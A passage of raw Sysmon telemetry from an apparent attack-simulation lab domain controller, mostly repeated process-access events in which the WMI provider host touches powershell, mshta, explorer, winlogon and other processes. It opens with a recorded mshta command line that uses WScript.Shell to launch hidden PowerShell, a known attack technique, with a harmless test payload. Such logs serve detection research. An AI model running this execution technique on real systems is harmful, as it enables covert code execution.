";a=new%%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%%20-nop%%20-Command%%20Write-Host%%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%%20Start-Sleep%%20-Seconds%%202;%%20exit",0,true);close();C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000026244Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5366-6008-6406-00000000A301}6528C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026243Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026242Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026241Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026240Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026239Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026238Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026237Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026236Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026235Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026234Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026233Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026232Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026231Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026230Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026229Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026228Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026227Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026226Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026225Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program 